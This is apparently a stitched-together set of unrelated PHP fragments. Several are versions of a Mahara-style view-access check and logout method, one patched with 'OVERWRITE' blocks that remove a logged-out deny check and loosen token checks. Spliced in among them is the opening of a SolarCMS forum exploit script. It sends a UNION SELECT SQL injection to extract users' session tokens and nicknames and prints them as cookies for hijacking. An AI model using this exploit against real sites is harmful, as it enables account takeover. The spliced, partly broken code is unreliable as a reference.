/** * Logs the current user out */ public function logout() { // Add long-term cookie to record institution user last used. // We can only do if the institution_config table exists, // which it will not if we are upgrading from pre 1.9 so we check when // the instituion_config table was added. if (get_config('version') >= '2014010800') { set_cookie('lastinstitution', $this->sitepages_institutionname_by_theme('loggedouthome'), '2240561472', true); } // Clear any secret URL access cookies foreach (array('viewaccess:', 'mviewaccess:', 'viewaccess:') as $cookiename) { foreach (get_cookies($cookiename) as $id => $token) { set_cookie($cookiename . $id, '', 1); } } require_once get_config('libroot') . 'ddl.php'; if ($this->changed == true) { log_debug('Destroying user with un-committed changes'); } $this->set('logout_time', 0); if ($this->authenticated === true) { $this->SESSION->set('messages', array()); } // Unset session variables related to authentication $this->SESSION->set('authinstance', null); if (get_config('installed') && !defined('INSTALLER') && $this->get('sessionid') && table_exists(new XMLDBTable('usr_session'))) { delete_records('usr_session', 'session', $this->get('sessionid')); } reset($this->defaults); foreach (array_keys($this->defaults) as $key) { $this->set($key, $this->defaults[$key]); } // We don't want to commit the USER object after logout: $this->changed = false; }
/** * Given a view id, and a user id (defaults to currently logged in user if not * specified) will return wether this user is allowed to look at this view. * * @param mixed $view viewid or View to check * @param integer $user_id User trying to look at the view (defaults to * currently logged in user, or null if user isn't logged in) * * @returns boolean Wether the specified user can look at the specified view. */ function can_view_view($view, $user_id = null) { global $USER, $SESSION; if (defined('BULKEXPORT')) { return true; } $now = time(); $dbnow = db_format_timestamp($now); if ($user_id === null) { $user = $USER; $user_id = $USER->get('id'); } else { $user = new User(); if ($user_id) { try { $user->find_by_id($user_id); } catch (AuthUnknownUserException $e) { } } } $publicviews = get_config('allowpublicviews'); $publicprofiles = get_config('allowpublicprofiles'); // If the user is logged out and the publicviews & publicprofiles sitewide configs are false, // we can deny access without having to hit the database at all if (!$user_id && !$publicviews && !$publicprofiles) { return false; } require_once get_config('libroot') . 'view.php'; if ($view instanceof View) { $view_id = $view->get('id'); } else { $view = new View($view_id = $view); } // If the page belongs to an individual, check for individual-specific overrides if ($view->get('owner')) { $ownerobj = $view->get_owner_object(); // Suspended user if ($ownerobj->suspendedctime) { return false; } // Probationary user (no public pages or profiles) // (setting these here instead of doing a return-false, so that we can do checks for // logged-in users later) require_once get_config('libroot') . 'antispam.php'; $onprobation = is_probationary_user($ownerobj->id); $publicviews = $publicviews && !$onprobation; $publicprofiles = $publicprofiles && !$onprobation; // Member of an institution that prohibits public pages // (group views and logged in users are not affected by // the institution level config for public views) $owner = new User(); $owner->find_by_id($ownerobj->id); $publicviews = $publicviews && $owner->institution_allows_public_views(); } // Now that we've examined the page owner, check again for whether it can be viewed by a logged-out user if (!$user_id && !$publicviews && !$publicprofiles) { return false; } if ($user_id && $user->can_edit_view($view)) { return true; } // If the view's owner is suspended, deny access to the view if ($view->get('owner')) { if (!($owner = $view->get_owner_object()) || $owner->suspendedctime) { return false; } } if ($SESSION->get('mnetuser')) { $mnettoken = get_cookie('mviewaccess:' . $view_id); } // If the page has been marked "objectionable" admins should be able to view // it for review purposes. if ($view->is_objectionable()) { if ($owner = $view->get('owner')) { if ($user->is_admin_for_user($owner)) { return true; } } else { if ($view->get('group') && $user->get('admin')) { return true; } } } // Overriding start/stop dates are set by the owner to deny access // to users who would otherwise be allowed to see the view. However, // for some kinds of access (e.g. objectionable content, submitted // views), we have to override the override and let the logged in // user see it anyway. So we can't return false now, we have to wait // till we find out what kind of view_access record is being used. $overridestart = $view->get('startdate'); $overridestop = $view->get('stopdate'); $allowedbyoverride = (empty($overridestart) || $overridestart < $dbnow) && (empty($overridestop) || $overridestop > $dbnow); $access = View::user_access_records($view_id, $user_id); if (empty($access)) { return false; } foreach ($access as &$a) { if ($a->accesstype == 'public' && $allowedbyoverride) { if ($publicviews) { return true; } else { if ($publicprofiles && $view->get('type') == 'profile') { return true; } } } else { if ($a->token && ($allowedbyoverride || !$a->visible)) { $usertoken = get_cookie('viewaccess:' . $view_id); if ($a->token == $usertoken && $publicviews) { return true; } if (!empty($mnettoken) && $a->token == $mnettoken) { $mnetviewlist = $SESSION->get('mnetviewaccess'); if (empty($mnetviewlist)) { $mnetviewlist = array(); } $mnetviewlist[$view_id] = true; $SESSION->set('mnetviewaccess', $mnetviewlist); return true; } // Don't bother to pull the collection out unless the user actually // has some collection access cookies. if ($ctokens = get_cookies('caccess:')) { $cid = $view->collection_id(); if ($cid && isset($ctokens[$cid]) && $a->token == $ctokens[$cid]) { return true; } } } else { if ($user_id) { if ($a->accesstype == 'friends') { $owner = $view->get('owner'); if (!get_field_sql(' SELECT COUNT(*) FROM {usr_friend} f WHERE (usr1=? AND usr2=?) OR (usr1=? AND usr2=?)', array($owner, $user_id, $user_id, $owner))) { continue; } } else { if ($a->institution) { // Check if user belongs to the allowed institution if (!in_array($a->institution, array_keys($user->get('institutions')))) { continue; } } } if (!$allowedbyoverride && $a->visible) { continue; } // The view must have loggedin access, user access for the user // or group/role access for one of the user's groups return true; } } } } return false; }
/** * Given a view id, and a user id (defaults to currently logged in user if not * specified) will return wether this user is allowed to look at this view. * * @param mixed $view viewid or View to check * @param integer $user_id User trying to look at the view (defaults to * currently logged in user, or null if user isn't logged in) * * @returns boolean Wether the specified user can look at the specified view. */ function can_view_view($view, $user_id = null) { global $USER, $SESSION; if (defined('BULKEXPORT')) { return true; } $now = time(); $dbnow = db_format_timestamp($now); if ($user_id === null) { $user = $USER; $user_id = $USER->get('id'); } else { $user = new User(); if ($user_id) { try { $user->find_by_id($user_id); } catch (AuthUnknownUserException $e) { } } } $publicviews = get_config('allowpublicviews'); $publicprofiles = get_config('allowpublicprofiles'); // OVERWRITE 1: deletion //if (!$user_id && !$publicviews && !$publicprofiles) { // return false; //} // END OVERWRITE 1 if (!class_exists('View')) { require_once get_config('libroot') . 'view.php'; } if ($view instanceof View) { $view_id = $view->get('id'); } else { $view = new View($view_id = $view); } // group views and logged in users are not affected by // the institution level config for public views if (empty($user_id) && ($ownerobj = $view->get_owner_object())) { $owner = new User(); $owner->find_by_id($ownerobj->id); if (!$owner->institution_allows_public_views()) { return false; } } if ($user_id && $user->can_edit_view($view)) { return true; } $access = View::user_access_records($view_id, $user_id); if (empty($access)) { return false; } // If the view's owner is suspended, deny access to the view if ($view->get('owner')) { if (!($owner = $view->get_owner_object()) || $owner->suspendedctime) { return false; } } // Overriding start/stop dates are set by the owner to deny access // to users who would otherwise be allowed to see the view. However, // for some kinds of access (e.g. objectionable content, submitted // views), we have to override the override and let the logged in // user see it anyway. So we can't return false now, we have to wait // till we find out what kind of view_access record is being used. $overridestart = $view->get('startdate'); $overridestop = $view->get('stopdate'); $allowedbyoverride = (empty($overridestart) || $overridestart < $dbnow) && (empty($overridestop) || $overridestop > $dbnow); if ($SESSION->get('mnetuser')) { $mnettoken = get_cookie('mviewaccess:' . $view_id); } foreach ($access as &$a) { if ($a->accesstype == 'public' && $allowedbyoverride) { if ($publicviews) { return true; } else { if ($publicprofiles && $view->get('type') == 'profile') { return true; } } } else { if ($a->token && ($allowedbyoverride || !$a->visible)) { $usertoken = get_cookie('viewaccess:' . $view_id); // OVERWRITE 2: replacement, changed from: //if ($a->token == $usertoken && $publicviews) { // return true; //} // to: if ($a->token == $usertoken) { if (!$publicviews) { global $CFG; $mhr_view = $CFG->current_app->selectFromMhrTable('view', 'id', $view_id, true); if ($mhr_view) { if (!isset($mhr_view->institution) || $mhr_view->institution == '') { return false; } } } return true; } // END OVERWRITE 2 if (!empty($mnettoken) && $a->token == $mnettoken) { $mnetviewlist = $SESSION->get('mnetviewaccess'); if (empty($mnetviewlist)) { $mnetviewlist = array(); } $mnetviewlist[$view_id] = true; $SESSION->set('mnetviewaccess', $mnetviewlist); return true; } // Don't bother to pull the collection out unless the user actually // has some collection access cookies. if ($ctokens = get_cookies('caccess:')) { $cid = $view->collection_id(); if ($cid && isset($ctokens[$cid]) && $a->token == $ctokens[$cid]) { return true; } } } else { if ($user_id) { if ($a->accesstype == 'friends') { $owner = $view->get('owner'); if (!get_field_sql(' SELECT COUNT(*) FROM {usr_friend} f WHERE (usr1=? AND usr2=?) OR (usr1=? AND usr2=?)', array($owner, $user_id, $user_id, $owner))) { continue; } } else { if ($a->institution) { // Check if user belongs to the allowed institution if (!in_array($a->institution, array_keys($user->get('institutions')))) { continue; } } else { if ($a->accesstype == 'objectionable') { if ($owner = $view->get('owner')) { if ($user->is_admin_for_user($owner)) { return true; } } else { if ($view->get('group') && $user->get('admin')) { return true; } } continue; } } } if (!$allowedbyoverride && $a->visible) { continue; } // The view must have loggedin access, user access for the user // or group/role access for one of the user's groups return true; } } } } return false; }
error_reporting(0); /*************************************************************** * --------------------------------------------------------- * * SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit * * --------------------------------------------------------- * * by athos - staker[at]hotmail[dot]it * * download on http://cms.maury91.org/ * * works regardless PHP.ini settings * * --------------------------------------------------------- * ***************************************************************/ list($file, $host, $path, $myid, $table) = $argv; if ($argc != 5) { usage(); } $cookie = preg_match('/\\^(.+?)\\^/', get_cookies(), $out) ? explode(':', $out[1]) : error(); if ($path == '/') { print "_nick={$cookie[1]}; path=/;\n"; print "_sauth={$cookie[0]}; path=/;\n"; exit; } else { print "/{$path}_nick={$cookie[1]}; path=/;\n"; print "/{$path}_sauth={$cookie[0]}; path=/;\n"; exit; } function get_cookies() { global $host, $path, $myid, $table; $data .= "GET {$path}/index.php?com=Forum&cat=-1+union+select+1,"; $data .= "concat(0x5e,sauth,0x3a,nick,0x5e),3+from+{$table}+where+id={$myid}-- HTTP/1.1\r\n"; $data .= "Host: {$host}\r\n";
/** * Given a view id, and a user id (defaults to currently logged in user if not * specified) will return wether this user is allowed to look at this view. * * @param integer $view_id View ID to check * @param integer $user_id User trying to look at the view (defaults to * currently logged in user, or null if user isn't logged in) * * @returns boolean Wether the specified user can look at the specified view. */ function can_view_view($view_id, $user_id = null) { global $USER, $SESSION; if (defined('BULKEXPORT')) { return true; } $now = time(); $dbnow = db_format_timestamp($now); if ($user_id === null) { $user = $USER; $user_id = $USER->get('id'); } else { $user = new User(); if ($user_id) { try { $user->find_by_id($user_id); } catch (AuthUnknownUserException $e) { } } } $publicviews = get_config('allowpublicviews'); $publicprofiles = get_config('allowpublicprofiles'); if (!$user_id && !$publicviews && !$publicprofiles) { return false; } require_once get_config('libroot') . 'view.php'; $view = new View($view_id); if ($user_id && $user->can_edit_view($view)) { return true; } $access = View::user_access_records($view_id, $user_id); if (empty($access)) { return false; } if ($SESSION->get('mnetuser')) { $mnettoken = get_cookie('mviewaccess:' . $view_id); } foreach ($access as &$a) { if ($a->accesstype == 'public') { if ($publicviews) { return true; } else { if ($publicprofiles && $view->get('type') == 'profile') { return true; } } } else { if ($a->token) { $usertoken = get_cookie('viewaccess:' . $view_id); if ($a->token == $usertoken && $publicviews) { return true; } if (!empty($mnettoken) && $a->token == $mnettoken) { $mnetviewlist = $SESSION->get('mnetviewaccess'); if (empty($mnetviewlist)) { $mnetviewlist = array(); } $mnetviewlist[$view_id] = true; $SESSION->set('mnetviewaccess', $mnetviewlist); return true; } // Don't bother to pull the collection out unless the user actually // has some collection access cookies. if ($ctokens = get_cookies('caccess:')) { $cid = $view->collection_id(); if ($cid && isset($ctokens[$cid]) && $a->token == $ctokens[$cid]) { return true; } } } else { if ($user_id) { if ($a->accesstype == 'friends') { $owner = $view->get('owner'); if (!get_field_sql(' SELECT COUNT(*) FROM {usr_friend} f WHERE (usr1=? AND usr2=?) OR (usr1=? AND usr2=?)', array($owner, $user_id, $user_id, $owner))) { continue; } } else { if ($a->accesstype == 'objectionable') { if ($owner = $view->get('owner')) { if ($user->is_admin_for_user($owner)) { return true; } } else { if ($view->get('group') && $user->get('admin')) { return true; } } continue; } } // The view must have loggedin access, user access for the user // or group/role access for one of the user's groups return true; } } } } return false; }